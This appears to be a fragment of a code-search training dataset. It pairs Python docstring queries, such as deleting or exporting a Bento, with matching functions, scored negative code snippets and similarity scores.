"def vbd_list(name=None, call=None):\n if call == \"function\":\n raise SaltCloudSystemExit(\n \"This function must be called with -a, --action argument.\"\n )\n if name is None:\n return \"A name kwarg is rquired\"\n ret = {}\n data = {}\n session = _get_session()\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n vm = vms[0]\n vbds = session.xenapi.VM.get_VBDs(vm)\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n data[\"vbd-{}\".format(x)] = vbd_record\n x += 1\n ret = data\n return ret",
"def do_ls(self, arg):\n\t\topts = get_options(parser.parser_ls, arg)\n\t\tif opts is None: return\n\t\tweight = opts.weight\n\t\tdisplay.print_bets(self.manager.bets, weight = weight,\n\t\t\t\tdisplay_resolved = opts.display_resolved,\n\t \t\t\tdisplay_open = opts.display_open,\n\t\t\t\tlimit = opts.limit)",
"def list(self, arguments):\n\n print(\"{}\\t{}\".format(\n 'BOX'.rjust(35),\n 'VERSION'.rjust(12),\n ))\n path = os.path.abspath(os.path.join(HOME, 'boxes'))\n for root, dirnames, filenames in os.walk(path):\n for filename in fnmatch.filter(filenames, '*.box'):\n directory = os.path.dirname(os.path.join(root, filename))[len(path) + 1:]\n account, box, version = (directory.split(os.path.sep, 2) + ['', ''])[:3]\n print(\"{}\\t{}\".format(\n \"{}/{}\".format(account, box).rjust(35),\n version.rjust(12),\n ))",
"def List(cls):\n return WordList.query().fetch_async()",
"def list():\n rino.login.list()",
"def printall():\n print listAll()",
"async def list(self, ctx):\r\n try:\r\n if ctx.message.server.id not in self.adkillr:\r\n await self.bot.say(\"There are no filters set for this server.\")\r\n else:\r\n await self.bot.say(\"The current filters are\\n{}.\".format(\", \".join(self.adkillr[ctx.message.server.id]['filters'])))\r\n except KeyError:\r\n await self.bot.say(\"There are no filters set for this server.\")",
"def cafe_list():\n\n cafes = Cafe.query.order_by('name').all()\n\n return render_template(\n 'cafe/list.html',\n cafes=cafes,\n )",
"def getlist_command(chat, message, args):\n msg = \"\"\n get_last = os.popen(path_to_bin + \"/bitcanna-cli listtransactions\").read()\n loaded_json = json.loads(get_last)\n for tx in loaded_json:\n date_time = datetime.datetime.fromtimestamp(tx['blocktime']).strftime('%c')\n msg = msg + tx['category'] + \" BCNA: \" + str(tx['amount']) + \" at \" + date_time + \"\\n\"\n print (msg)\n chat.send(msg)",
"def list():\n index = config.index\n output_format = \"%-7s %-20s %s\"\n click.secho(output_format % (\"ID\", \"CREATED\", \"BACKENDS\"), fg=\"cyan\")\n for archive in sorted(index.archives(), key=lambda x: x[\"id\"]):\n # Print it out\n click.echo(\n output_format\n % (\n archive[\"id\"],\n datetime.datetime.fromtimestamp(archive[\"created\"]).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n \", \".join(sorted(archive[\"backend_names\"])),\n )\n )",
"def list_formacaos_cmd():\n return ListFormacaoCommand()",
"def display_book(self):\n print(\"List of books available is: \")\n for book in books_list :\n print(\"- \",book)",
"def cargar_bolsa(self,lista):\n self.bolsa = lista",
"def get_hold_lists():\n no_token = 'Y'\n list_of_books = overdrive_apis.get_hold_list(no_token)\n return render_template('hold_list.html', list_of_books=list_of_books, what='hold')",
"def comando_listagem(self):\r\n if not args.data and not args.nnf and not args.chave:\r\n parser.error(\"informe a opcao -d, -n ou -c para listagem de notas.\")\r\n\r\n\tif args.data:\r\n # Usuario nao autorizado\r\n self.busca_por_data(args.data[0], args.data[1])\r\n return\r\n\r\n if not args.serie:\r\n parser.error(\"informe a opcao -s para serie\")\r\n\r\n\tif args.nnf:\r\n if args.bloco: # processa as notas em bloco por causa de erros de\r\n\t\t # Segmentation fault\r\n listagem = self.busca_por_nnf_bloco(args.nnf[0], args.nnf[1], \r\n\t\t\t args.serie, args.bloco)\r\n # Criar formatacao para as outras buscas\r\n\t # Em caso de Exception: A listagem nao esta sendo atualizada.\r\n if args.irregular: # Inclui notas nao utilizadas\r\n # python /u1/caixa/nfce.py -p listagem -n 256 270 -s 80 -ib 1\r\n sequencia = [] # Lista contendo numeros de notas utilizadas\r\n for nota in listagem:\r\n sequencia.append(int(nota[\"docnumero\"]))\r\n serie = listagem[0][\"docserie\"] \r\n notas_nao_utilizadas = self.sequencia_nao_utilizada(serie, sequencia)\r\n for nota in notas_nao_utilizadas:\r\n listagem.append(nota) # Append das notas nao utilizadas\r\n \r\n #diretorio = None\r\n self.formata_listagem(listagem)\r\n else:\r\n self.busca_por_nnf(args.nnf[0], args.nnf[1], args.serie)\r\n return\r\n\r\n\tif args.chave:\r\n self.busca_por_chave(args.chave, args.serie)",
"def list():\n data = getInstaData()\n return render_template(\"list.html\", data=data)",
"def show_books():\n result = {'books': query.get_book_list()}\n return json.dumps(result, ensure_ascii=False)",
"def GET(self):\n listing = sandbox.list(sandbox_name)\n return render.index(listing=listing)",
"def list(self, start=0, end=10):\n print(\"GBTIDL> \")",
"def do_all(self, arg):\n objs = []\n arg = arg.split()\n if arg and arg[0] not in HBNBCommand.dict.keys():\n print(\"** class doesn't exist **\")\n return\n if len(arg) == 0:\n objs = [i.__str__() for i in storage.all().values()]\n else:\n for objects in storage.all().values():\n if arg[0] in objects.__class__.__name__:\n objs.append(objects.__str__())\n print(objs)",
"def do_all(self, arg):\n arg_list = arg.split(\" \") if type(arg) == str else arg\n if arg:\n if arg_list[0] not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n obj_list = []\n for key, val in storage.all().items():\n if key.split(\".\")[0] == arg_list[0]:\n obj_list.append(str(val))\n print(obj_list)\n return\n obj_list = [str(val) for val in storage.all().values()]\n print(obj_list)",
"def list_books():\n view_book_tk = BooklistDialog()\n view_book_tk.create_components()\n view_book_tk.mainloop()",
"def list_tags():\r\n tags = Tag.query.order_by(Tag.name).all()\r\n return render_template('tags.html', tags=tags)",
"def print_list(self):\n self.print_avec_separateur(\" \")",
"def get_all_bank_names() -> List[str]:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from bank\"\n cursor.execute(query)\n data = cursor.fetchall()\n r_list = [x[0] for x in data]\n db.disconnect()\n return r_list",
"def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs",
"async def list(self, ctx, debug=\"0\"):\n if debug != \"0\" and debug != \"1\":\n debug = \"0\"\n\n with db_session:\n no_prefix_commands = select(c for c in CCCommands if c.type == 0 and c.guild_id == ctx.guild.id)[:]\n prefix_commands = select(c for c in CCCommands if c.type == 1 and c.guild_id == ctx.guild.id)[:]\n embed_commands = select(c for c in CCCommands if c.type == 2 and c.guild_id == ctx.guild.id)[:]\n\n def add_commands(commands, paginator):\n if not commands:\n paginator.add_line(\"There are no commands setup.\")\n else:\n for command in commands:\n output = command.name\n if debug == \"1\":\n output += \" = '{}'\".format(command.output if command.type == 2 else command.output[0])\n paginator.add_line(\"- \" + output)\n\n paginator = commands.Paginator(prefix=\"```md\")\n paginator.add_line(\"__Here is the list of Custom Commands...__\")\n paginator.add_line()\n\n paginator.add_line(\"__Prefix Commands (Non Embeds):__\")\n add_commands(prefix_commands, paginator)\n paginator.add_line()\n\n paginator.add_line(\"__Prefix Commands (Embeds):__\")\n add_commands(embed_commands, paginator)\n paginator.add_line()\n\n paginator.add_line(\"__Commands that don't require prefix:__\")\n add_commands(no_prefix_commands, paginator)\n\n for page in paginator.pages:\n await ctx.send(page)",
"def list_tags():\n\n tags = Tag.query.all()\n return render_template('tags/list_tags.html', tags=tags)",
"def get(self):\n bots = []\n whitelist = ndb.Key('BotWhitelist', WHITELIST_KEY).get()\n if whitelist:\n bots = whitelist.bots\n self.RenderHtml('bot_whitelist.html', {'bot_whitelist': '\\n'.join(bots)})",
"def list(cls, context, filters=None, limit=3000, marker=1,\n sort_key='id', sort_dir='asc'):\n db_boars = cls.dbapi.get_boar_list(\n context, limit=limit, marker=marker, sort_key=sort_key,\n sort_dir=sort_dir, filters=filters)\n\n #import pdb; pdb.set_trace()\n return [Boar._from_db_object(cls(context), obj) for obj in db_boars]",
"def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output",
"def filter_list(client, args):\n from ..util import print_query\n print_query(client.context.query)",
"def devlist_handler(userdata, *args):\n\t\tfor (dev, connected) in database.devlist(userdata[\"cursor\"]):\n\t\t\tif dev == \"devmaster\":\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif connected:\n\t\t\t\tprint(shlex.quote(\"+\" + dev), end=\" \")\n\t\t\telse:\n\t\t\t\tprint(shlex.quote(\"-\" + dev), end=\" \")\n\t\t\n\t\tprint()",
"def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])",
"async def slashtag_list(self, ctx: commands.Context):\n tags = self.guild_tag_cache[ctx.guild.id]\n if not tags:\n return await ctx.send(\"There are no slash tags on this server.\")\n await self.view_slash_tags(ctx, tags, is_global=False)",
"async def list(self, ctx):\n message = '\\n'.join(sorted(self.etrigs['etrigs'].keys(), key=str.lower))\n message = '```http\\n{}\\n```'.format(message)\n await ctx.send(message)",
"def show():\n conn = sqlite3.connect(\"lite.db\")\n cursor = conn.cursor()\n\n # Query to display all records from the db\n cursor.execute(\"SELECT * from store\")\n\n # Fetch this data\n rows = cursor.fetchall()\n\n conn.close()\n\n return rows",
"def list(refresh):\n # This works too, but is much slower:\n # ogrinfo WFS:http://openmaps.gov.bc.ca/geo/ows?VERSION=1.1.0\n for table in bcdata.list_tables(refresh):\n click.echo(table)",
"def command_list(self, query):\n return query",
"def list(ctx, show_hidden, oath_type, period):\n ensure_validated(ctx)\n controller = ctx.obj['controller']\n creds = [cred\n for cred in controller.list()\n if show_hidden or not cred.is_hidden\n ]\n creds.sort()\n for cred in creds:\n click.echo(cred.printable_key, nl=False)\n if oath_type:\n click.echo(u', {}'.format(cred.oath_type.name), nl=False)\n if period:\n click.echo(', {}'.format(cred.period), nl=False)\n click.echo()",
"def revision_list():\n for rev in orm.DataRevision.select():\n click.echo(rev.name)",
"def fetch_browse_list_contents (self):\n response = self._session_get(component='browse')\n return BeautifulSoup(response.text, 'html.parser')",
"async def getList(author, page):\n availableCommands = await _generateList(author, False)\n availableCommands.sort(key=lambda x: x['name'])\n totalPages = math.floor(len(availableCommands)/10) + 1\n if page == 100:\n page = totalPages\n if page > totalPages or page < 1:\n return False\n availableCommands = availableCommands[(page-1)*10:(page)*10]\n return assembleEmbed(\n title=f\"List of Commands for `{author}` (Page {page}/{totalPages})\",\n desc=\"\\n\".join([f\"`{c['name']}` - {c['description']}\" for c in availableCommands])\n )",
"async def statusinfo(self, astable):\n cmd = subprocess.check_output([\"birdc\", \"show\", \"proto\", \"all\", str(astable)])\n for page in chat_formatting.pagify(cmd.decode(), ['\\n', ' '], shorten_by=12):\n await self.bot.say(chat_formatting.box(page))",
"def list_contents(self, show_hidden: bool = False):\n directories = []\n files = []\n if show_hidden:\n directories.extend([\".\", \"..\"])\n for entry in self.get_entries():\n if not entry.is_hidden() or show_hidden:\n if isinstance(entry, SaveFile):\n files.append(entry.get_bytes())\n elif isinstance(entry, Directory):\n directories.append(entry.get_name())\n elif isinstance(entry, NormalFile):\n files.append(entry.get_name())\n return \"\\n\".join(directories + files)"
] | [
"0.6460789",
"0.609852",
"0.605642",
"0.60312444",
"0.5958324",
"0.58794826",
"0.58415896",
"0.5798007",
"0.57732534",
"0.5748135",
"0.5748135",
"0.5723663",
"0.57183725",
"0.57072484",
"0.568819",
"0.56753975",
"0.5644786",
"0.56367767",
"0.5634464",
"0.5600329",
"0.55807924",
"0.55764073",
"0.55742526",
"0.5569244",
"0.5554157",
"0.5543209",
"0.55427235",
"0.55304193",
"0.550797",
"0.5504177",
"0.54993236",
"0.5497197",
"0.54932976",
"0.5476266",
"0.5470888",
"0.54633945",
"0.54630065",
"0.5430105",
"0.54295635",
"0.5424926",
"0.54076475",
"0.54075795",
"0.5407418",
"0.5403061",
"0.5400699",
"0.5386188",
"0.53672916",
"0.53628457",
"0.5358894",
"0.5344667",
"0.5344029",
"0.53436214",
"0.5341648",
"0.5337106",
"0.53304726",
"0.5329493",
"0.5328525",
"0.5325903",
"0.5320613",
"0.53116494",
"0.5304739",
"0.52994716",
"0.528599",
"0.5283532",
"0.527208",
"0.52693814",
"0.52524954",
"0.5250811",
"0.52428025",
"0.5223776",
"0.5222837",
"0.52153856",
"0.5211978",
"0.5209869",
"0.5205011",
"0.5202621",
"0.5199694",
"0.5198853",
"0.5193965",
"0.5193884",
"0.51927215",
"0.5191535",
"0.51910836",
"0.51822585",
"0.5182114",
"0.5177651",
"0.5177442",
"0.51725256",
"0.5165793",
"0.5158005",
"0.514929",
"0.51490307",
"0.51468825",
"0.51445866",
"0.51444995",
"0.51434624",
"0.51367456",
"0.5134298",
"0.51295584",
"0.511541"
] | 0.66813993 | 0 |
Delete Bento in local bento store. \b | def delete(delete_targets: list[str], yes: bool) -> None: # type: ignore (not accessed)
def delete_target(target: str) -> None:
tag = Tag.from_str(target)
if tag.version is None:
to_delete_bentos = bento_store.list(target)
else:
to_delete_bentos = [bento_store.get(tag)]
for bento in to_delete_bentos:
if yes:
delete_confirmed = True
else:
delete_confirmed = click.confirm(f"delete bento {bento.tag}?")
if delete_confirmed:
bento_store.delete(bento.tag)
logger.info("%s deleted.", bento)
for target in delete_targets:
delete_target(target) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def delete(self):\n self.storage.delete(basket=self)\n self.uncache()\n self._data = None\n self.dirty = False",
"def dangerously_delete(self, bento_name, bento_version):",
"def delete(self):\n\n lod_history = self.repo._get_lod_history(self.lod)\n assert lod_history.exists()\n lod_history.update(self.repo._youngest, None)\n self._mark_deleted()",
"def delete():",
"def _delete_from_db(self):\r\n if not self._created:\r\n return\r\n\r\n tdb.del_thing(self._type_id, self._id)\r\n cache.delete(thing_prefix(self.__class__.__name__, self._id))",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n pass",
"def delete(self):\n ...",
"def delete(self, obj):",
"def delete(self):\n self.current_revision.delete()",
"def delete(self):\n self.dbm().model_delete(self)",
"def delete(self):\n self.data = None",
"def __delete__(self):\n pass",
"def delete(self):\r\n s = self.get_session()\r\n s.delete(self)\r\n s.commit()",
"def do_destroy(self, arg):\n obj = self.verify(arg, 2)\n if obj:\n del storage.all()[obj]\n storage.save()",
"def delete_leader(self):",
"def delete(ctx):\n click.echo('deleting')\n ctx.delete()\n click.echo('done')",
"def delete(self, obj=None):\n pass",
"def wipe():\n\tdb.session.query(Target).delete()\n\tdb.session.commit()",
"def model_delete(self, db):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n if Model.data_connector:\n with Model.data_connector.u_lock:\n Model.data_connector.remove_object(self)",
"def test_delete(self):\n c = city.City(name=\"Freiburg\")\n p1 = city.Citizen(name=\"Peter\")\n p2 = city.Citizen(name=\"Georg\")\n p3 = city.Citizen(name=\"Hans\")\n c.add(p1, p2, p3, rel=city.hasInhabitant)\n\n with DataspaceSession(URI) as session:\n wrapper = city.CityWrapper(session=session)\n cw = wrapper.add(c)\n session.commit()\n\n cw.remove(p3.uid)\n session.prune()\n session.commit()\n\n check_state(self, c, p1, p2, db=DB)",
"def src_delete(state):\n _lib.src_delete(state)",
"def after_delete(self, obj, st):\n pass",
"def delete(self):\n self.manager.delete(self.name)",
"def delete(self):\n self.manager.delete(self.name)",
"def delete(self) -> None:\n self.pop()",
"def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])",
"def delete(self):\n raise NotImplementedError",
"def delete(self):\r\n db.session.delete(self)\r\n db.session.commit()",
"def __del__(self) -> None:\n self.map.ent_id.discard(self.id)",
"def delete(self):\n self.id = uuid4()\n DataStore.remove_instance(self)",
"def __del__(self):\n self.evaler.db.flush()",
"def delete(self):\n del self.shx.atoms[self.index]",
"def delete(self):\n self.package = None",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def delete(self):\n return self._finalize()",
"def __del__(self):\r\n self.save()\r\n self.close()",
"def delete(self):\n\n del self.parent_mirror_dir[self.cvs_path]",
"def delete(self, obj=None):\n if not obj:\n return\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n if key in self.__objects:\n del self.__objects[key]\n self.save()",
"def __delitem__(self, key):\n with SessionContext(self.SessionClass) as session:\n q = session.query(PAW2_DBObject)\n q = q.filter(PAW2_DBObject.key == key)\n assert q.delete(synchronize_session=False) == 1\n session.commit()",
"def delete(self, box):\n boom = box.GetSelection()\n if boom == box.GetRootItem():\n return\n\n item_data = box.GetItemData(boom).GetData()\n\n if isinstance(item_data, data_types.ProductData):\n boom = box.GetItemParent(boom)\n item_data = box.GetItemData(boom).GetData()\n\n db = database.TransactionsDB()\n\n if box is self.list_sales:\n func = db.delete_sale\n sale.update_inventory(item_data, undo=True)\n elif box is self.list_expenses:\n func = db.delete_expense\n else:\n func = db.delete_waste\n waste.update_inventory(item_data, undo=True)\n\n func(item_data.ID)\n\n db.close()\n self.setup(None)",
"def tearDown(self) -> None:\n place = storage.get(Place, self.place_id)\n if place is not None:\n storage.delete(place)\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()",
"def tearDown(self) -> None:\n place = storage.get(Place, self.place_id)\n if place is not None:\n storage.delete(place)\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()",
"def hdel(self):\n return self.delete()",
"def delete(self, obj):\n raise NotImplementedError",
"def delete(self):\n self.read = False\n self.write = False\n self.save()",
"def delete(self):\n self.manager.delete(self)",
"def _post_delete(self, instance, **kwargs):\n pk_name = instance._meta.pk.name\n for key in self.cache_fields:\n if key in ('pk', pk_name):\n continue\n # remove pointers\n cache.delete(self._get_from_cache_key(**{key: getattr(instance, key)}))\n # remove actual object\n cache.delete(self._get_from_cache_key(**{pk_name: instance.pk}))",
"def do_command(self, args):\n compops = dbops.Completions()\n compops.delete(args)",
"def tearDown(self) -> None:\n storage.delete(self.place)\n storage.delete(self.user)\n storage.delete(self.city)\n storage.delete(self.state)\n storage.save()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n db.session.delete(self)\n db.session.commit()",
"def __del__(self):\n print(f\"{self.fullname()} deleted from database.\")",
"def done(self):\n\t\tdef txn():\n\t\t\tother = db.get(self.key())\n\t\t\tif other and other.eta == self.eta:\n\t\t\t\tother.delete()\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn db.run_in_transaction(txn)",
"def delete_obj(obj):\n Session.delete(obj)\n Session.flush()\n Session.commit()",
"def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)",
"def rm(self, *args, **kwargs):\n return self.unload(*args, **kwargs)",
"def destroy(self):",
"def destroy(self):",
"def destroy(self):",
"def processDeleteCommand(self, objId):\n editor = self._parent\n obj = editor.findWithUUID(objId)\n if obj:\n print(\"DELETE FOR\",objId)\n # delete from object cache\n if objId in editor._total['objects']:\n del editor._total['objects'][objId]\n # clear uuid\n obj.opensim.uuid = \"\"\n scene = editor.get_current_scene()\n # unlink\n scene.objects.unlink(obj)\n editor.queueRedraw()",
"def remove(self):\r\n\t\tself._delete()",
"def delete_order():",
"def remove_data(self):\n db.session.delete(self)\n db.session.commit( )",
"def delete_from_db(self):\n db.session.delete(self)\n db.session.commit()",
"def delete_from_db(self):\n db.session.delete(self)\n db.session.commit()",
"def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []",
"def current_remove(self):\n storage.close()",
"def delete_item(self):\n\n\t\tdb.session.delete(self)\n\t\tdb.session.commit()",
"def __delete__(self, obj):\n self._instances.pop(obj, None)",
"def test_data_object_untrash(self):\n pass",
"def drop(self):\n self.id = None",
"def deleteBall(self):\n self._ball = None",
"def delete(self):\n\n raise NotImplementedError()",
"def test_heads_delitem_pass(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n del heads[\"branch\"]\n assert \"branch\" not in heads",
"def delete(self):\r\n self.domain.delete_item(self)",
"def __del__(self) -> None:\n self.delete()",
"def delete(self):\n raise NotImplementedError()",
"def delete(self):\n raise NotImplementedError()",
"def before_delete(self, obj, st):\n pass",
"def __del__(self) -> None:\n if hasattr(self, \"model\") and hasattr(self, \"_destruct\"):\n self._destruct(self.model)",
"def func(self):\n\n self.caller.execute_cmd('@del ' + self.caller.db.fbat + '-' + self.caller.db.lbat)\n\n #self.caller.msg(\"Command called!\")",
"def delete(self):\n if not self.is_deleted:\n self.is_deleted = True\n self.save()",
"def delete(self):\n return self.manager.delete(self)"
] | [
"0.7051506",
"0.68354255",
"0.680618",
"0.64838576",
"0.64788866",
"0.6383846",
"0.6383846",
"0.6383846",
"0.6383846",
"0.637536",
"0.63332254",
"0.6227315",
"0.61815846",
"0.6153086",
"0.6130447",
"0.61282235",
"0.6125379",
"0.6116602",
"0.6077102",
"0.60508895",
"0.6031658",
"0.6025468",
"0.60040647",
"0.59909344",
"0.5989163",
"0.59889525",
"0.5967301",
"0.5967301",
"0.59635353",
"0.59553885",
"0.5950985",
"0.5940412",
"0.5938346",
"0.5934857",
"0.5934752",
"0.5931889",
"0.59244204",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59231746",
"0.59039587",
"0.5903605",
"0.5897541",
"0.5897235",
"0.58945966",
"0.58934915",
"0.58934915",
"0.5891001",
"0.5886444",
"0.58826756",
"0.5878675",
"0.58736813",
"0.58594215",
"0.58519155",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.5848976",
"0.58442944",
"0.5843443",
"0.58417416",
"0.58336276",
"0.582947",
"0.58235586",
"0.58235586",
"0.58235586",
"0.5822185",
"0.58186907",
"0.5816163",
"0.58144146",
"0.5809263",
"0.5809263",
"0.58072317",
"0.5805331",
"0.5797819",
"0.5797092",
"0.57955664",
"0.5795496",
"0.5794935",
"0.5786463",
"0.57848495",
"0.57813334",
"0.57792926",
"0.577909",
"0.577909",
"0.57715803",
"0.57562584",
"0.5752619",
"0.57510054",
"0.57412195"
] | 0.0 | -1 |
Export a Bento to an external file archive \b | def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)
bento = bento_store.get(bento_tag)
out_path = bento.export(out_path)
logger.info("%s exported to %s.", bento, out_path) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def archive(po_filename, bl_filename):\n\n # Store archive in same dir as this script\n root = os.path.abspath(os.path.dirname(sys.argv[0]))\n\n po_archive = root + '/po.csv.%s' % datetime.date.today()\n bl_archive = root + '/bl.csv.%s' % datetime.date.today()\n\n shutil.move(po_filename, po_archive)\n shutil.move(bl_filename, bl_archive)\n\n perms = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH\n os.chmod(po_archive, perms)\n os.chmod(bl_archive, perms)",
"def _toFile(self):\n pass",
"def export_to_file(self):\r\n return True",
"def save(self, export_path: str):",
"def test_export(self):\n structure = {\n \"README.rst\": \"Hi this is 1.0.0.\",\n \"twisted\": {\n \"newsfragments\": {\"README\": \"Hi this is 1.0.0\"},\n \"_version.py\": genVersion(\"twisted\", 1, 0, 0),\n \"web\": {\n \"newsfragments\": {\"README\": \"Hi this is 1.0.0\"},\n \"_version.py\": genVersion(\"twisted.web\", 1, 0, 0),\n },\n },\n }\n reposDir = self.makeRepository(self.tmpDir)\n self.createStructure(reposDir, structure)\n self.commitRepository(reposDir)\n\n exportDir = FilePath(self.mktemp()).child(\"export\")\n self.createCommand.exportTo(reposDir, exportDir)\n self.assertStructure(exportDir, structure)",
"def BT_export(self):\n src = os.path.join(self.resMan.base_path, Config.instance().weld_BT_root_folder)\n srcs=self.BTMan.get_subdirs(src)\n dst = os.path.join(self.project.rootdir, Config.instance().weld_BT_root_folder)\n #this operation has lots of exceptions to output...\n try:\n for src in srcs:\n self.BTMan.export(src, dst)\n except Exception, e:\n print >> sys.__stderr, 'ERROR in Weld.BT_export():'\n print >> sys.__stderr, e.args[0]\n print >> sys.__stderr, 'export cancelled (some cleanup might be needed in %s)' % dst",
"def wrapped_tarball(export_context, context):\n result = export_result_dict(export_context)\n RESPONSE = context.REQUEST.RESPONSE\n RESPONSE.setHeader('Content-type', 'application/x-gzip')\n RESPONSE.setHeader('Content-disposition',\n 'attachment; filename=%s' % result['filename'])\n return result['tarball']",
"def exportBulletFile(*argv):",
"def export_samfile(self):",
"def archive(mongo_backup_file):\r\n filename = get_archive_filename()\r\n tar = tarfile.open(filename, \"w|gz\")\r\n tar.add(mongo_backup_file)\r\n tar.close()\r\n\r\n return filename",
"def export(self, stream):\n pass",
"def saveto(file, tmpfile):\n args = {\"file\": file, \"tmpfile\": tmpfile}\n send_command(\"saveto\", args)",
"def _export_bh_(cls, self):",
"def _export_button_cb(self):\n filename = asksaveasfile(\n mode='w',\n filetypes=(('YAML files', '*.yaml'), ('All files', '*.*'))\n )\n\n if not filename:\n return\n\n with open(filename.name, 'w') as f:\n f.write('obstacles:\\n')\n for obstacle in self.obstacles:\n f.write(f' - {str(obstacle)}')\n f.write('\\n')",
"def extract_to_disk(self):\n archive_name, extension = os.path.splitext(os.path.basename(self.file.name))\n if not os.path.isdir(os.path.join(os.getcwd(), archive_name)):\n os.mkdir(archive_name)\n os.chdir(archive_name)\n for filename, data in self.extract().items():\n f = open(filename, 'wb')\n f.write(data or b'')\n f.close()",
"def save_as_archive(self):\n dest_file_path = QFileDialog.getSaveFileName(self)[0]\n self.binder.to_archive(dest_file_path)",
"def archive(self, header, target: str, output_target: str = None):\n\t\ttry:\n\t\t\ttarget = os.path.abspath(target)\n\t\t\tif output_target:\n\t\t\t\toutfile = output_target\n\t\t\telse:\n\t\t\t\tif os.path.isfile(target):\n\t\t\t\t\toutfile = target + \".edz\"\n\t\t\t\telif os.path.isdir(target):\n\t\t\t\t\toutfile = os.path.join(target, os.path.basename(target) + \".edz\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No valid output target\")\n\t\t\t\t\treturn\n\t\t\t#Zip target dir\n\t\t\tprint(f\"Creating virtual zip of {target}\")\n\t\t\tzip_bytes_object = zipit(target)\n\t\t\tprint(f\"Making .edz at {outfile}...\")\n\t\t\twith open(outfile, \"w+b\") as out:\n\t\t\t\tprint(\"Writing header...\")\n\t\t\t\tout.write(header)\n\t\t\t\tprint(\"Writing zip contents...\")\n\t\t\t\tout.write(zip_bytes_object.getvalue())\n\t\t\tprint(\"Success!\")\n\t\t\treturn outfile\n\t\texcept Exception as e:\n\t\t\tprint(f\"Failed to create edizip from target {target} - {e}\")\n\t\t\tprint(\"Attempting cleanup...\")\n\t\t\ttry:\n\t\t\t\tif os.path.isfile(outfile):\n\t\t\t\t\tprint(f\"Removing possibly invalid archive {outfile}\")\n\t\t\t\t\tos.remove(outfile)\n\t\t\texcept:\n\t\t\t\tpass",
"def make_file(self):\n\n f = open(get_output_path(), \"w\")\n \n f.write(self.export())\n \n f.close()\n\n return self",
"def export(self, token):\n studio_module = request.env['ir.module.module'].get_studio_module()\n data = request.env['ir.model.data'].search([('studio', '=', True)])\n content = export.generate_archive(studio_module, data)\n\n return request.make_response(content, headers=[\n ('Content-Disposition', content_disposition('customizations.zip')),\n ('Content-Type', 'application/zip'),\n ('Content-Length', len(content)),\n ], cookies={'fileToken': token})",
"def to_walden(self):\n with tempfile.NamedTemporaryFile() as f:\n # fetch the file locally\n files.download(self.source_data_url, f.name)\n\n # add it to walden, both locally, and to our remote file cache\n add_to_catalog(self.metadata, f.name, upload=True)",
"def __export_file(self, filename, output):\n outfile = open(filename, \"w\")\n outfile.write(output)\n outfile.close\n print(\"Output written to file: \" + filename + \"\\n\")",
